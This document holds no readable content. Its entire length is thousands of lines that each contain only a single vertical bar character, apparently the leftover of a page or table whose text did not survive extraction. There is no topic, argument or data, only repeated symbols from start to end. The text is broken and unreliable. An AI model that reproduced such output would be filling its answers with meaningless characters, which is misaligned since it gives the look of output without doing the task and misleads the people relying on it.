|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
